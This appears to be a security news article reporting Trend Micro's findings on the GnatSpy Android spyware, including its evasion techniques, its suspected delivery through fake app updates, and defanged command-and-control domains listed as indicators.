New GnatSpy Mobile Malware Family Found with More Capabilities

A new mobile malware family called GnatSpy is detected that is believed to be a latest variant of VAMP. The researchers have named this as ANDROIDOS_GNATSPY. As some of the command-and-control (C&C) domains are being reused in GnatSpy variants, the attackers that were behind Two-tailed Scorpion/APT-C-23, are assumed working to boost the performance of next massive mobile malware family.

VAMP, the Google Android malware family was focused to steal information such as images, contacts, text messages and more from the victims’ mobile phones. It indicates that the new mobile malware family GnatSpy also targeting to fetch the information by befooling Android users.

Although the structure of new GnatSpy variants found to be different from the old variants, still some of the capabilities are spotted as similar. The threat actors have added more receivers and services to make these new variants more capable as well as modular. The old and new receivers as well as services are shown in screenshots:

                             GnatSpy receivers and servicesGnatSpy receivers and services

The researchers of Trend Micro make an analysis of new coding and reported that the threat actors have used Java annotations and reflection methods to a high extent, due to which GnatSpy variants cannot be easily listed as malicious.

ava annotations and reflection methods ava annotations and reflection methods

Earlier, the malicious app’s code contained C&C server in such a manner that was easy to detect by static analysis tools. On the other hand, now it’s not easy to spot the server from the code.

While it’s still a mystery, how the threat actors are injecting malicious apps or files in victims’ mobile devices. Perhaps the these are being sent by disguising as genuine updates of most known apps. The names given to malicious apps prevents users to doubt on the authenticity and they download & install them quickly.

The command-and-control domains are being checked for the investigation, but the information about the registrant is not available as the threat actors might choose domain privacy. Even some of the C&C domains are registered recently.

Trend Micro researchers team encountered two C&C domains cecilia-gilbert[.]com and lagertha-lothbrok[.]info that were reported to be associated to VAMP and FrozenCell, respectively.

GnatSpy is reportedly targeting Huawei devices, Xiaomi devices and some other devices running Android Marshmallow and Nougat.

We shall update the article, if we found more information about GnatSpy.

Leave a Comment